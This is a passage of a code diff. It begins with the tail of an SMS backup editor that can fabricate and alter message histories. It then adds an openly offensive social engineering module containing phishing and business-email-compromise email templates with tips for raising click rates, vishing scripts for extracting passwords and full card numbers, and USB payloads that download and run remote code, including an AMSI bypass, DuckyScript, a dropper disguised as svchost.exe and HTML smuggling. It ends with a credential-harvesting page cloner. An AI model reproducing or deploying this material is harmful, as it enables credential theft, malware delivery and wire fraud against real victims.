2=sent)', '1') + contact = self._cli_input('Contact name', '(Unknown)') + att_path = self._cli_input('Attachment file path (blank for none)') + attachments = [] + if att_path and os.path.isfile(att_path): + ct = self._cli_input('Content type', 'image/jpeg') + attachments.append({ + 'path': att_path, + 'content_type': ct, + 'filename': os.path.basename(att_path), + }) + result = self.add_mms(address, body, attachments, int(box_str), contact_name=contact) + print(f" Added MMS at index {result['index']}") + + def _cli_add_conversation(self): + address = self._cli_input('Phone number') + contact = self._cli_input('Contact name', '(Unknown)') + print(" Enter messages (empty body to finish):") + messages = [] + while True: + body = self._cli_input(f' Message {len(messages) + 1} body') + if not body: + break + type_str = self._cli_input(' Type (1=received, 2=sent)', '1') + delay_str = self._cli_input(' Delay (minutes from previous)', '5') + messages.append({ + 'body': body, + 'type': int(type_str), + 'delay_minutes': int(delay_str), + }) + if messages: + result = self.add_conversation(address, contact, messages) + print(f" Added {result['added']} messages") + else: + print(" No messages to add.") + + def _cli_generate_template(self): + templates = self.get_templates() + print(" Available templates:") + for key, tmpl in templates.items(): + print(f" {key}: {tmpl['name']} -- {tmpl['description']}") + name = self._cli_input('Template name') + if name not in templates: + print(" Template not found.") + return + address = self._cli_input('Phone number') + contact = self._cli_input('Contact name') + variables = {} + tmpl = templates[name] + for var in tmpl.get('variables', []): + val = self._cli_input(f' {var}') + variables[var] = val + result = self.generate_conversation(address, contact, name, variables) + if result.get('ok'): + print(f" Generated {result.get('added', 0)} messages") + else: + print(f" Error: {result.get('error')}") + + def _cli_find_messages(self): + address = self._cli_input('Filter by address (blank for all)') + keyword = self._cli_input('Filter by keyword (blank for all)') + results = self.find_messages( + address=address if address else None, + keyword=keyword if keyword else None, + ) + print(f" Found {len(results)} messages:") + for msg in results[:20]: + direction = 'IN' if msg.get('type', msg.get('msg_box', 1)) == 1 else 'OUT' + body = msg.get('body', '')[:60] + print(f" [{msg['index']}] {direction} {msg.get('address', '')}: {body}") + if len(results) > 20: + print(f" ... and {len(results) - 20} more") + + def _cli_modify_message(self): + idx_str = self._cli_input('Message index') + if not idx_str: + return + new_body = self._cli_input('New body (blank to skip)') + new_contact = self._cli_input('New contact name (blank to skip)') + result = self.modify_message( + int(idx_str), + new_body=new_body if new_body else None, + new_contact=new_contact if new_contact else None, + ) + if result.get('ok'): + print(" Message modified.") + else: + print(f" Error: {result.get('error')}") + + def _cli_delete_messages(self): + idx_str = self._cli_input('Message indices (comma-separated)') + if not idx_str: + return + indices = [int(x.strip()) for x in idx_str.split(',') if x.strip().isdigit()] + result = self.delete_messages(indices) + print(f" Deleted {result['deleted']} messages, {result['remaining']} remaining.") + + def _cli_replace_contact(self): + old = self._cli_input('Old address') + new = self._cli_input('New address') + name = self._cli_input('New contact name (blank to keep)') + result = self.replace_contact(old, new, name if name else None) + print(f" Updated {result['updated']} messages.") + + def _cli_shift_timestamps(self): + address = self._cli_input('Address (blank for all)') + offset = self._cli_input('Offset in minutes (negative to go back)') + result = self.shift_timestamps( + address if address else None, + int(offset), + ) + print(f" Shifted {result['shifted']} messages by {result['offset_minutes']} minutes.") + + def _cli_export_xml(self): + path = self._cli_input('Output path', str(self._data_dir / 'export.xml')) + result = self.export_xml(path) + if result.get('ok'): + print(f" Exported to {result['path']} ({result['count']} messages, {result['size']} bytes)") + else: + print(f" Error: {result.get('error')}") + + def _cli_export_csv(self): + path = self._cli_input('Output path', str(self._data_dir / 'export.csv')) + result = self.export_csv(path) + if result.get('ok'): + print(f" Exported to {result['path']} ({result['count']} messages)") + else: + print(f" Error: {result.get('error')}") + + def _cli_import_csv(self): + path = self._cli_input('CSV file path') + if not path: + return + result = self.bulk_add(path) + if result.get('ok'): + print(f" Imported {result['added']} messages") + if result.get('errors'): + for err in result['errors'][:5]: + print(f" Warning: {err}") + else: + print(f" Error: {result.get('error')}") + + def _cli_merge_backups(self): + paths_str = self._cli_input('Backup file paths (comma-separated)') + if not paths_str: + return + paths = [p.strip() for p in paths_str.split(',') if p.strip()] + result = self.merge_backups(paths) + if result.get('ok'): + print(f" Merged: {result['total']} total messages ({result['added']} new)") + if result.get('errors'): + for err in result['errors']: + print(f" Error: {err}") + + def _cli_validate(self): + path = self._cli_input('XML file path') + if not path: + return + result = self.validate_backup(path) + if result.get('valid'): + print(f" Valid backup ({result['element_count']} elements)") + else: + print(" Invalid backup:") + for issue in result.get('issues', []): + print(f" - {issue}") + if result.get('error'): + print(f" Error: {result['error']}") + + def _cli_stats(self): + stats = self.get_backup_stats() + print(f" Total messages: {stats['total']}") + print(f" SMS: {stats['sms_count']}, MMS: {stats['mms_count']}") + print(f" Sent: {stats['sent']}, Received: {stats['received']}") + print(f" Contacts: {len(stats['contacts'])}") + if stats.get('date_range'): + dr = stats['date_range'] + print(f" Date range: {dr['earliest_readable']} -- {dr['latest_readable']}") + for c in stats.get('contacts', [])[:10]: + print(f" {c['address']} ({c['name']}): {c['count']} messages") + + def _cli_list_templates(self): + templates = self.get_templates() + for key, tmpl in templates.items(): + tag = '[builtin]' if tmpl.get('builtin') else '[custom]' + print(f" {key} {tag}: {tmpl['name']}") + print(f" {tmpl['description']}") + print(f" Messages: {tmpl['message_count']}, Variables: {', '.join(tmpl.get('variables', []))}") + print() diff --git a/modules/social_eng.py b/modules/social_eng.py new file mode 100644 index 0000000..1f62083 --- /dev/null +++ b/modules/social_eng.py @@ -0,0 +1,1305 @@ +"""AUTARCH Social Engineering Toolkit + +Credential harvesting page cloner, pretexting templates, QR code phishing, +USB drop payloads, vishing scripts, and campaign tracking. +""" + +DESCRIPTION = "Social engineering — phishing, pretexts, QR codes" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import uuid +import base64 +import struct +import hashlib +import threading +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any +from urllib.parse import urljoin, urlparse + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + import requests + REQUESTS_AVAILABLE = True +except ImportError: + requests = None + REQUESTS_AVAILABLE = False + +try: + import qrcode + import io as _io + QRCODE_AVAILABLE = True +except ImportError: + qrcode = None + QRCODE_AVAILABLE = False + + +# ── Pretext Templates ──────────────────────────────────────────────────────── + +PRETEXT_TEMPLATES = { + 'it_support': [ + { + 'name': 'Password Reset', + 'subject': 'Immediate Action Required: Password Reset', + 'body': ( + 'Dear {target_name},\n\n' + 'Our security team has detected unusual activity on your account. ' + 'As a precautionary measure, we require all employees to reset their ' + 'passwords within the next 24 hours.\n\n' + 'Please click the link below to verify your identity and set a new password:\n' + '{link}\n\n' + 'If you did not request this change, please contact the IT Help Desk immediately ' + 'at ext. 4357.\n\n' + 'Best regards,\n' + 'IT Security Team' + ), + 'pretext_notes': 'Urgency + authority. Works best when sent from a spoofed IT domain. ' + 'Follow up with a phone call referencing the email for higher success rates.', + }, + { + 'name': 'Security Update Required', + 'subject': 'Critical Security Patch — Action Required by EOD', + 'body': ( + 'Hi {target_name},\n\n' + 'A critical security vulnerability has been identified that affects your workstation. ' + 'IT has prepared an automated patch that must be installed today.\n\n' + 'Please run the update tool at the link below:\n' + '{link}\n\n' + 'Note: You may need to enter your network credentials to authenticate the update.\n\n' + 'Thank you for your cooperation,\n' + 'IT Infrastructure Team' + ), + 'pretext_notes': 'Leverages fear of security breach. Pair with a fake update portal.', + }, + { + 'name': 'VPN Reconfiguration', + 'subject': 'VPN Client Reconfiguration — New Certificate Required', + 'body': ( + 'Dear {target_name},\n\n' + 'Due to our migration to a new security infrastructure, all VPN certificates ' + 'will expire at midnight tonight. To maintain remote access, please download ' + 'the new VPN configuration file:\n' + '{link}\n\n' + 'You will need to authenticate with your current credentials to generate ' + 'a new certificate.\n\n' + 'Questions? Contact the Network Operations Center at noc@{domain}\n\n' + 'Regards,\n' + 'Network Security Team' + ), + 'pretext_notes': 'Effective against remote workers. The VPN config file can be a payload.', + }, + ], + 'hr': [ + { + 'name': 'Benefits Enrollment', + 'subject': 'Open Enrollment Period — Benefits Selection Deadline', + 'body': ( + 'Dear {target_name},\n\n' + 'The annual open enrollment period for employee benefits closes on Friday. ' + 'If you have not yet made your selections, please log in to the benefits ' + 'portal to review your options:\n' + '{link}\n\n' + 'Failure to complete enrollment by the deadline will result in default ' + 'coverage being applied.\n\n' + 'Human Resources Department' + ), + 'pretext_notes': 'Time pressure on something people care about. High click rates.', + }, + { + 'name': 'Policy Update Acknowledgement', + 'subject': 'Updated Company Policy — Acknowledgement Required', + 'body': ( + 'Dear {target_name},\n\n' + 'Our legal department has updated the Employee Handbook and Acceptable Use Policy. ' + 'All employees are required to review and acknowledge the changes by {deadline}.\n\n' + 'Please read and sign the updated documents here:\n' + '{link}\n\n' + 'Thank you,\n' + 'HR Compliance' + ), + 'pretext_notes': 'Compliance obligation creates urgency. Rarely questioned.', + }, + { + 'name': 'Employee Survey', + 'subject': 'Annual Employee Satisfaction Survey — Your Input Matters', + 'body': ( + 'Hi {target_name},\n\n' + 'We value your feedback! Please take 5 minutes to complete our annual ' + 'employee satisfaction survey. Your responses are anonymous and will help ' + 'shape company improvements.\n\n' + 'Complete the survey here: {link}\n\n' + 'Survey closes {deadline}.\n\n' + 'Thank you,\n' + 'People & Culture Team' + ), + 'pretext_notes': 'Low suspicion — surveys are common. Good for initial reconnaissance.', + }, + ], + 'vendor': [ + { + 'name': 'Invoice Payment', + 'subject': 'Invoice #{invoice_num} — Payment Due', + 'body': ( + 'Dear Accounts Payable,\n\n' + 'Please find attached Invoice #{invoice_num} for services rendered during ' + 'the previous billing period. Payment is due within 30 days.\n\n' + 'To view and pay the invoice online:\n' + '{link}\n\n' + 'If you have questions about this invoice, please contact our billing ' + 'department at billing@{vendor_domain}\n\n' + 'Best regards,\n' + '{vendor_name}\n' + 'Accounts Receivable' + ), + 'pretext_notes': 'Target finance/AP departments. Research real vendor names first.', + }, + { + 'name': 'Service Renewal', + 'subject': 'Service Agreement Renewal — Action Required', + 'body': ( + 'Dear {target_name},\n\n' + 'Your {service_name} subscription is due for renewal on {deadline}. ' + 'To avoid service interruption, please review and approve the renewal terms:\n' + '{link}\n\n' + 'Current plan: {plan_name}\n' + 'Renewal amount: ${amount}\n\n' + 'Best regards,\n' + '{vendor_name} Renewals Team' + ), + 'pretext_notes': 'Service disruption fear. Research the target\'s actual vendors.', + }, + { + 'name': 'Account Verification', + 'subject': 'Account Security Verification Required', + 'body': ( + 'Dear {target_name},\n\n' + 'As part of our ongoing security measures, we need to verify your account ' + 'information. Please log in and confirm your details:\n' + '{link}\n\n' + 'If you do not verify within 48 hours, your account may be temporarily suspended.\n\n' + 'Thank you,\n' + '{vendor_name} Security Team' + ), + 'pretext_notes': 'Account suspension threat. Clone the vendor login page for harvesting.', + }, + ], + 'delivery': [ + { + 'name': 'Package Tracking', + 'subject': 'Your Package Has Shipped — Tracking #{tracking_num}', + 'body': ( + 'Your order has been shipped!\n\n' + 'Tracking Number: {tracking_num}\n' + 'Estimated Delivery: {delivery_date}\n\n' + 'Track your package in real-time:\n' + '{link}\n\n' + 'If you did not place this order, click here to report unauthorized activity:\n' + '{link}\n\n' + '{carrier_name} Shipping Notifications' + ), + 'pretext_notes': 'Curiosity + concern about unexpected package. High click rates.', + }, + { + 'name': 'Missed Delivery', + 'subject': 'Delivery Attempt Failed — Reschedule Required', + 'body': ( + 'We attempted to deliver your package today but no one was available to sign.\n\n' + 'Tracking: {tracking_num}\n' + 'Attempt: {attempt_date}\n\n' + 'To reschedule delivery or redirect to a pickup location:\n' + '{link}\n\n' + 'Your package will be held for 5 business days before being returned.\n\n' + '{carrier_name} Delivery Services' + ), + 'pretext_notes': 'Fear of missing a delivery. Works broadly across all demographics.', + }, + ], + 'executive': [ + { + 'name': 'CEO Wire Transfer', + 'subject': 'Urgent — Wire Transfer Needed Today', + 'body': ( + 'Hi {target_name},\n\n' + 'I need you to process an urgent wire transfer today. I am in meetings ' + 'all afternoon and cannot handle this myself.\n\n' + 'Amount: ${amount}\n' + 'Recipient: {recipient}\n' + 'Account details are in the attached document: {link}\n\n' + 'Please confirm once completed. This is time-sensitive.\n\n' + 'Thanks,\n' + '{exec_name}\n' + '{exec_title}' + ), + 'pretext_notes': 'Classic BEC/CEO fraud. Requires OSINT on exec names and targets in finance.', + }, + { + 'name': 'Confidential Acquisition', + 'subject': 'Confidential — M&A Due Diligence Documents', + 'body': ( + '{target_name},\n\n' + 'As discussed, I am sharing the preliminary due diligence documents for the ' + 'upcoming acquisition. This is strictly confidential — do not forward.\n\n' + 'Secure document portal: {link}\n\n' + 'Please review before our meeting on {meeting_date}.\n\n' + '{exec_name}\n' + '{exec_title}' + ), + 'pretext_notes': 'Flattery (being included in confidential deal) + authority. ' + 'Target senior staff who would plausibly be involved.', + }, + ], + 'financial': [ + { + 'name': 'Wire Transfer Confirmation', + 'subject': 'Wire Transfer Confirmation — ${amount}', + 'body': ( + 'Dear {target_name},\n\n' + 'A wire transfer of ${amount} has been initiated from your account.\n\n' + 'Transaction ID: {txn_id}\n' + 'Date: {txn_date}\n' + 'Recipient: {recipient}\n\n' + 'If you authorized this transaction, no action is needed.\n' + 'If you did NOT authorize this transfer, click below immediately:\n' + '{link}\n\n' + '{bank_name} Fraud Prevention' + ), + 'pretext_notes': 'Panic about unauthorized money movement. Very high click rates.', + }, + { + 'name': 'Tax Document', + 'subject': 'Your {tax_year} Tax Documents Are Ready', + 'body': ( + 'Dear {target_name},\n\n' + 'Your {tax_year} W-2 / 1099 tax documents are now available for download ' + 'through our secure portal:\n' + '{link}\n\n' + 'Please retrieve your documents before the filing deadline.\n\n' + 'Payroll Department\n' + '{company_name}' + ), + 'pretext_notes': 'Seasonal — most effective in January-April. Targets everyone.', + }, + ], +} + + +# ── USB Payload Templates ──────────────────────────────────────────────────── + +USB_PAYLOAD_TEMPLATES = { + 'autorun': { + 'name': 'Autorun.inf', + 'description': 'Classic autorun — triggers executable on USB insert (legacy systems)', + 'template': ( + '[autorun]\n' + 'open={executable}\n' + 'icon={icon}\n' + 'action=Open folder to view files\n' + 'label={label}\n' + 'shell\\open\\command={executable}\n' + 'shell\\explore\\command={executable}\n' + ), + }, + 'powershell_cradle': { + 'name': 'PowerShell Download Cradle', + 'description': 'PS1 script disguised as document — downloads and executes payload', + 'template': ( + '# Disguise: rename to something enticing like "Salary_Review_2026.pdf.ps1"\n' + '$ErrorActionPreference = "SilentlyContinue"\n' + '# Disable AMSI for this session\n' + '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").' + 'GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)\n' + '# Download and execute\n' + '$u = "{payload_url}"\n' + '$c = (New-Object System.Net.WebClient).DownloadString($u)\n' + 'IEX($c)\n' + '# Optional: open a decoy document\n' + '# Start-Process "https://hr.company.com/benefits"\n' + ), + }, + 'hid_script': { + 'name': 'HID Script (Rubber Ducky DuckyScript)', + 'description': 'USB HID attack — keystroke injection via Rubber Ducky / BadUSB', + 'template': ( + 'REM AUTARCH USB HID Payload\n' + 'REM Target: Windows\n' + 'DELAY 1000\n' + 'GUI r\n' + 'DELAY 500\n' + 'STRING powershell -w hidden -ep bypass -c "IEX((New-Object Net.WebClient).DownloadString(\'{payload_url}\'))"\n' + 'DELAY 100\n' + 'ENTER\n' + 'DELAY 2000\n' + 'REM Payload delivered\n' + ), + }, + 'bat_file': { + 'name': 'BAT File Dropper', + 'description': 'Batch file disguised as document shortcut — downloads and runs payload', + 'template': ( + '@echo off\n' + 'title Opening Document...\n' + 'echo Please wait while the document loads...\n' + 'REM Download payload\n' + 'powershell -w hidden -ep bypass -c "' + '$c=New-Object Net.WebClient;' + '$c.DownloadFile(\'{payload_url}\',\'%TEMP%\\svchost.exe\');' + 'Start-Process \'%TEMP%\\svchost.exe\'"\n' + 'REM Open decoy\n' + 'start "" "{decoy_url}"\n' + 'exit\n' + ), + }, + 'lnk_dropper': { + 'name': 'LNK Shortcut Dropper', + 'description': 'Windows shortcut file command — executes hidden PowerShell on click', + 'template': ( + 'REM Create this LNK with target:\n' + 'REM %comspec% /c powershell -w hidden -ep bypass -c "' + 'IEX((New-Object Net.WebClient).DownloadString(\'{payload_url}\'))"\n' + 'REM Icon: shell32.dll,3 (folder icon) or shell32.dll,1 (document)\n' + 'REM Name: Quarterly_Report or Shared_Photos\n' + ), + }, + 'html_smuggling': { + 'name': 'HTML Smuggling', + 'description': 'HTML file that assembles and drops a payload via JavaScript', + 'template': ( + '\n' + '{title}\n' + '\n' + '

Loading document...

\n' + '

If the download does not start automatically, click here.

\n' + '\n' + '\n' + ), + }, +} + + +# ── Vishing Scripts ────────────────────────────────────────────────────────── + +VISHING_SCRIPTS = { + 'it_helpdesk': { + 'name': 'IT Help Desk Call', + 'description': 'Impersonate IT support to extract credentials or install remote access', + 'opening': ( + 'Hello, this is {caller_name} from the IT Help Desk. ' + 'We are seeing some unusual activity on your network account and I need ' + 'to verify a few things with you to make sure your account is secure.' + ), + 'key_questions': [ + 'Can you confirm your full name and employee ID for verification?', + 'What department are you in?', + 'Are you currently logged in to your workstation?', + 'Have you noticed any unusual behavior — slow performance, unexpected pop-ups?', + 'I am going to need to push a security update to your machine. Can you open a browser and go to {url}?', + ], + 'credential_extraction': ( + 'I need to verify your account is not compromised. Can you enter your ' + 'username and current password on the verification page I just sent you? ' + 'This is a secure IT portal — your credentials are encrypted.' + ), + 'objection_handling': { + 'why_calling': 'Our monitoring system flagged your account. We are reaching out to all affected users proactively.', + 'how_verify_you': 'You can call back on the main IT line at {phone} and ask for {caller_name} in Security Operations.', + 'not_comfortable': 'I completely understand. Let me have my supervisor {supervisor_name} call you back within 10 minutes.', + 'will_call_back': 'Of course. Please call the Help Desk at {phone} before 5 PM today, as we need to resolve this within our response window.', + }, + 'closing': 'Thank you for your cooperation. I have updated your account status. If you notice anything unusual, call us at {phone}.', + }, + 'bank_fraud': { + 'name': 'Bank Fraud Alert', + 'description': 'Impersonate bank fraud department to extract account details', + 'opening': ( + 'Hello, this is {caller_name} from the {bank_name} Fraud Prevention Department. ' + 'We are calling because we have detected a suspicious transaction on your account ' + 'and we need to verify some information before we can proceed with blocking it.' + ), + 'key_questions': [ + 'For verification, can you confirm the last four digits of your account number?', + 'What is the billing address associated with this account?', + 'Did you authorize a transaction of ${amount} to {merchant} on {date}?', + 'I need to verify your identity. Can you provide your date of birth?', + ], + 'credential_extraction': ( + 'To block the fraudulent transaction and secure your account, I will need to ' + 'verify your full card number and the security code on the back. This is to ' + 'confirm you are the authorized account holder.' + ), + 'objection_handling': { + 'why_calling': 'Our automated fraud detection system flagged a ${amount} charge that does not match your normal spending pattern.', + 'how_verify_you': 'You can call the number on the back of your card and ask to be transferred to the fraud department.', + 'not_comfortable': 'I understand your concern. For your protection, I can place a temporary hold on the card while you verify through the bank app.', + 'will_call_back': 'Absolutely. Please call the number on the back of your card within the hour. Reference case number {case_num}.', + }, + 'closing': 'I have placed a temporary hold on the suspicious transaction. You will receive a confirmation text shortly. Is there anything else I can help with?', + }, + 'vendor_support': { + 'name': 'Vendor Technical Support', + 'description': 'Impersonate software vendor support for remote access installation', + 'opening': ( + 'Hi, this is {caller_name} with {vendor_name} Support. We noticed that your ' + 'organization\'s {product_name} license is showing some configuration errors ' + 'that could lead to data loss. I\'d like to help resolve this quickly.' + ), + 'key_questions': [ + 'Who is the primary administrator for your {product_name} installation?', + 'What version are you currently running?', + 'Are you able to access the admin console right now?', + 'I may need to connect remotely to diagnose the issue. Do you have remote access software available?', + ], + 'credential_extraction': ( + 'To apply the fix, I will need your admin credentials for {product_name}. ' + 'Alternatively, you can grant me temporary admin access through the portal at {url}.' + ), + 'objection_handling': { + 'why_calling': 'Our monitoring detected your instance is running a configuration that was flagged in security bulletin {bulletin_id}.', + 'how_verify_you': 'You can verify this call by contacting {vendor_name} support at {phone} and referencing ticket {ticket_id}.', + 'not_comfortable': 'No problem. I can send you detailed instructions via email and you can perform the fix yourself.', + 'will_call_back': 'Sure. The support ticket is {ticket_id}. Please call us back within 24 hours before the issue escalates.', + }, + 'closing': 'The configuration has been updated. You should see the fix reflected within the next hour. If any issues arise, reference ticket {ticket_id}.', + }, + 'ceo_urgent': { + 'name': 'CEO Urgent Request', + 'description': 'Impersonate executive for urgent financial action', + 'opening': ( + 'Hi {target_name}, this is {exec_name}. I know this is short notice, ' + 'but I need your help with something urgent and confidential. I am tied up ' + 'in a board meeting and cannot handle this myself right now.' + ), + 'key_questions': [ + 'Are you at your desk right now?', + 'Can you access the accounts payable system?', + 'Have you processed international wire transfers before?', + ], + 'credential_extraction': ( + 'I need you to process a wire transfer for a time-sensitive acquisition. ' + 'The details are in a secure document I will email you. Please use your ' + 'credentials to authorize the transfer immediately.' + ), + 'objection_handling': { + 'why_calling': 'This is related to a confidential acquisition. I cannot discuss details over email for legal reasons.', + 'need_approval': 'I\'ve already approved this with the CFO. You can verify with {cfo_name} after the transfer — but we need to move now.', + 'not_comfortable': 'I understand, but this cannot wait. I\'ll take full responsibility. Just process it and I\'ll sign the authorization form when I\'m out of this meeting.', + 'unusual_request': 'I know this is irregular. That\'s why I\'m calling you personally instead of sending an email.', + }, + 'closing': 'Thank you for handling this so quickly. I really appreciate it. I will follow up with the paperwork once I am out of this meeting.', + }, +} + + +# ── Social Engineering Toolkit Class ───────────────────────────────────────── + +class SocialEngToolkit: + """Social engineering toolkit — page cloning, pretexts, QR codes, USB payloads.""" + + def __init__(self): + self._data_dir = Path(get_data_dir()) / 'social_eng' + self._pages_dir = self._data_dir / 'pages' + self._captures_path = self._data_dir / 'captures.json' + self._campaigns_path = self._data_dir / 'campaigns.json' + self._qr_dir = self._data_dir / 'qr' + + # Ensure directories + self._pages_dir.mkdir(parents=True, exist_ok=True) + self._qr_dir.mkdir(parents=True, exist_ok=True) + + # Load persistent state + self._captures = self._load_json(self._captures_path, []) + self._campaigns = self._load_json(self._campaigns_path, []) + + # ── Persistence helpers ────────────────────────────────────────────────── + + @staticmethod + def _load_json(path: Path, default=None): + try: + if path.exists(): + with open(path, 'r', encoding='utf-8') as f: + return json.load(f) + except (json.JSONDecodeError, OSError): + pass + return default if default is not None else {} + + def _save_captures(self): + with open(self._captures_path, 'w', encoding='utf-8') as f: + json.dump(self._captures, f, indent=2, default=str) + + def _save_campaigns(self): + with open(self._campaigns_path, 'w', encoding='utf-8') as f: + json.dump(self._campaigns, f, indent=2, default=str) + + # ── Page Cloning ───────────────────────────────────────────────────────── + + def clone_page(self, url: str, output_dir: str = None) -> Dict[str, Any]: + """Fetch a login page, rewrite form actions to AUTARCH capture endpoint. + + Returns dict with ok, page_id, path, and file details. + """ + if not REQUESTS_AVAILABLE: + return {'ok': False, 'error': 'requests library not installed'} + + try: + parsed = urlparse(url) + if not parsed.scheme: + url = 'https://' + url + parsed = urlparse(url) + + resp = requests.get(url, timeout=15, headers={ + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) ' + 'Chrome/120.0.0.0 Safari/537.36' + }, verify=False) + resp.raise_for_status() + + page_id = hashlib.md5(url.encode()).hexdigest()[:12] + page_dir = Path(output_dir) if output_dir else self._pages_dir / page_id + page_dir.mkdir(parents=True, exist_ok=True) + + html = resp.text + base_url = f"{parsed.scheme}://{parsed.netloc}" + + # Rewrite relative URLs for resources + html = re.sub( + r'(src|href)=(["\'])(?!/|https?://)', + lambda m: f'{m.group(1)}={m.group(2)}{base_url}/', + html + ) + + # Rewrite form actions to point to AUTARCH capture endpoint + html = re.sub( + r']*?)action=(["\'])[^"\']*\2', + f'